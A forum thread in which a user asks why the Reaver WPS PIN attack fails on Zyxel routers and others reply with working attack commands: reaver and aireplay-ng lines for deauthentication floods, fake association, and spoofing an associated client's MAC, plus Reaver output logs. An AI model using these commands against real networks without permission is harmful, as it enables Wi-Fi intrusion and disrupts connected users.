Reaver Not Working on Specific Zyxel Brand Routers (Any Solution). And why ??



FurqanHanif
2015-03-24, 17:34
I am using Kali Linux 1.1.0 with Reaver 1.5 and Bully (latest Git). The problem is that Reaver is not working with most Zyxel brand routers, even though WPS is enabled. I tried Reaver and Bully on my friend's router and I get nothing but "WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))", and after some time, when it successfully associates, I get an EAPOL warning and sometimes "WPS transaction Error". The interesting thing is that I tried Reaver on three Zyxel routers with the same result, and all of these routers were manufactured in 2009-2010 (when the WPS flaw had not yet gone public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx brand routers. Can someone explain to me why this is not working with these routers, and help me resolve this issue? (See the output below and the links for my Bully output and a screenshot of the WPS settings.)

http://i.imgur.com/NngbBZ7.png
http://i.imgur.com/uSdk9wE.png


reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:3E:61:9C:80:xx
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m8s.
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m15s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
^C
[+] Nothing done, nothing to save.

Thanks in advance. :)

FurqanHanif
2015-04-19, 11:48
Any solution? :/

soxrok2212
2015-04-19, 11:54
There's such a thing as a firmware update... Probably only set to WPS PBC.

FurqanHanif
2015-04-19, 12:15
Never updated the firmware, and auto firmware updating is not supported either.
Also, I think WPS is not only set to PBC. :/
(Please see the screenshot.)
http://i.imgur.com/NngbBZ7.png

soxrok2212
2015-04-19, 12:34
Could also be that the AP only acts as the registrar in the exchange and reaver also tries to be the registrar. You can't have 2 registrars. Try pressing "Add external registrar" and see if that works.

FurqanHanif
2015-04-19, 13:37
Tried "Add External Registrar", same issue. Also, when I restart/reboot my router, or it restarts because of a power failure, both PIN sections become blank.

Saydamination
2015-04-20, 09:27
Try the -S -N -L -E -d 1 -r 9:61 options.

Best options for Zyxel modems.

FurqanHanif
2015-04-21, 13:57
> Try the -S -N -L -E -d 1 -r 9:61 options.
>
> Best options for Zyxel modems.

Tried every combination, same issue. :(

Saydamination
2015-04-25, 08:36
Umm... I think the Zyxel modem crashed after the brute force...

Use airodump-ng and listen to it... open Wireshark and read the messages...

Beacons, probe responses...

If you see a lot of block messages, change your MAC address (macchanger).

If you see a lot of error/failed messages, the modem has probably crashed!

FurqanHanif
2015-04-26, 17:37
> Umm... I think the Zyxel modem crashed after the brute force...
>
> Use airodump-ng and listen to it... open Wireshark and read the messages...
>
> Beacons, probe responses...
>
> If you see a lot of block messages, change your MAC address (macchanger).
>
> If you see a lot of error/failed messages, the modem has probably crashed!

Here is the Wireshark output. Please see this.

http://www.fileconvoy.com/dfl.php?id=g9f6779f7d4b2682999965488453c452c189a6e471

nuroo
2015-04-26, 19:38
Not every access point is vulnerable. At this time only 2 1/2 chipsets are vulnerable to even the pixiewps attack, which you don't seem to be using.

The WPS PIN attack which you appear to be using requires much more time.

> [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
> [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)

When I've come across the error above, two things helped me.
1. Getting physically closer to the target router, or try -t20 (increases the receive timeout time).
2. Using a spoofed client MAC address and letting aireplay-ng handle keeping the association with the router.

reaver options
-A another program handles association
--mac=00:11:00:11:00:11
-t20


Use the forked version of reaver. (https://github.com/t6x/reaver-wps-fork-t6x) by t6x that has pixiewps built in.

Once you run the reaver linked above, report back the chipset.

mmusket33
2015-04-27, 11:31
To FurqanHanif

MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

There are two links for the VMR-MDK009x2 package. Read thru the help files, set up the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675, 676 and 677. You want the VMR-MDK009x2 package. Any questions, leave your comments in the aircrack forum.

Saydamination
2015-04-27, 13:11
Hi FurqanHanif,

I saw your cap file... The target AP does not answer your requests. There is no probe response or any information about the modem...

The modem is unusable...

Try other APs.

Good luck.

FurqanHanif
2015-04-28, 04:13
> To FurqanHanif
>
> MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html
>
> There are two links for the VMR-MDK009x2 package. Read thru the help files, set up the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675, 676 and 677. You want the VMR-MDK009x2 package. Any questions, leave your comments in the aircrack forum.

WPS lock is not the problem (WPS is unlocked, I checked with wash). This script is also not working.

Please see the Wireshark cap file and check.

FurqanHanif
2015-04-28, 04:14
> Hi FurqanHanif,
>
> I saw your cap file... The target AP does not answer your requests. There is no probe response or any information about the modem...
>
> The modem is unusable...
>
> Try other APs.
>
> Good luck.

But why is the target AP not replying? WPS is enabled (I checked with wash), and only this type of AP is causing the problem.

Saydamination
2015-04-28, 08:40
> But why is the target AP not replying? WPS is enabled (I checked with wash), and only this type of AP is causing the problem.

I have a broken modem. When I run it, it appears as an AP with WPS active, but it does not answer me.

Like in your post. :)

Try this, and you will see that Anybody connect AP... Because Unusable...

airodump-ng -c X --bssid XX:XX:XX:XX:XX:XX mon0

FurqanHanif
2015-04-30, 07:55
> I have a broken modem. When I run it, it appears as an AP with WPS active, but it does not answer me.
>
> Like in your post. :)
>
> Try this, and you will see that Anybody connect AP... Because Unusable...
>
> airodump-ng -c X --bssid XX:XX:XX:XX:XX:XX mon0

Broken modem? I don't get it. I am able to connect to the router and it's working fine; only Reaver is not working against it, even when WPS is enabled. Why? Still unclear.

mmusket33
2015-04-30, 08:33
To: FurqanHanif

The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

See if the router will respond to aireplay-ng

Start reaver with a channel setting; we suggest you use this command line. You must set a channel or aireplay-ng will not function.

Leave it running

Open a terminal window

reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

Set the correct channel and mac address

Open another terminal window

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Leave it running

Now hit the router with some deauths

Open a third terminal window

aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx mon0

Hit the router a few times with short deauth bursts

Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

These are simple methods. More advanced techniques require automated scripts.

MTeams

Saydamination
2015-04-30, 23:22
If the modem is working fine, try this.

First, connect to the AP like a normal user (visit websites, for traffic).
Later, try to find your password with a different device.

reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

You can receive the M1 "probe response" message (all information about the modem).

No traffic = no probe response = failed to associate with target AP...

Or you can try this...

Sometimes (I don't know why), if I shake or turn my wireless adapter, reaver is running to test... suddenly...

Turn your wireless adapter... shake on air...

FurqanHanif
2015-05-03, 04:59
> To: FurqanHanif
>
> The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:
>
> See if the router will respond to aireplay-ng
>
> Start reaver with a channel setting; we suggest you use this command line. You must set a channel or aireplay-ng will not function.
>
> Leave it running
>
> Open a terminal window
>
> reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30
>
> Set the correct channel and mac address
>
> Open another terminal window
>
> aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0
>
> Leave it running
>
> Now hit the router with some deauths
>
> Open a third terminal window
>
> aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx mon0
>
> Hit the router a few times with short deauth bursts
>
> Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.
>
> These are simple methods. More advanced techniques require automated scripts.
>
> MTeams

Tried your commands, no luck. Stuck on sending identity response.
See this cap file.
http://www.fileconvoy.com/dfl.php?id=g08c1f8ae7f5519db9996584220c37fbe9b342adad

FurqanHanif
2015-05-03, 05:00
> If the modem is working fine, try this.
>
> First, connect to the AP like a normal user (visit websites, for traffic).
> Later, try to find your password with a different device.
>
> reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv
>
> You can receive the M1 "probe response" message (all information about the modem).
>
> No traffic = no probe response = failed to associate with target AP...
>
> Or you can try this...
>
> Sometimes (I don't know why), if I shake or turn my wireless adapter, reaver is running to test... suddenly...
>
> Turn your wireless adapter... shake on air...

Connected to the AP and then tried Reaver, same issue, no M1, M2, etc. :(

mmusket33
2015-05-04, 09:58
MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (e.g. wlan0) AND the monitor (e.g. mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx option.

Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

MTeams

nuroo
2015-05-04, 12:10
> MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (e.g. wlan0) AND the monitor (e.g. mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx option.
>
> Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.
>
> MTeams

This is also the way I do it. Spoofing the mac address in the reaver command line with -m, using a known client, is often key. Another technique that helps for tough routers is to let aireplay-ng handle the association.
Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

Use the -h option also in aireplay-ng, same as the spoofed client mac.
Aireplay-ng .....standard options.......-h (spoofed client mac)

Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely a new issue.

parsec
2015-05-05, 02:36
This is good to know. I'm running a Zyxel PK5001Z router from my ISP and I'm having this same issue. I'll try the recommendations in this thread and report back.

FurqanHanif
2015-05-09, 10:27
> This is also the way I do it. Spoofing the mac address in the reaver command line with -m, using a known client, is often key. Another technique that helps for tough routers is to let aireplay-ng handle the association.
> Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)
>
> Use the -h option also in aireplay-ng, same as the spoofed client mac.
> Aireplay-ng .....standard options.......-h (spoofed client mac)
>
> Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely a new issue.

I tried everything, including the MAC spoofing stuff, no luck. :/

FurqanHanif
2015-05-09, 10:28
> MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (e.g. wlan0) AND the monitor (e.g. mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx option.
>
> Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.
>
> MTeams

Tried, not working.

Saydamination
2015-05-10, 12:53
Modem crash or WPS is inactive...

Try your luck with the Zyxel utility, if you have it.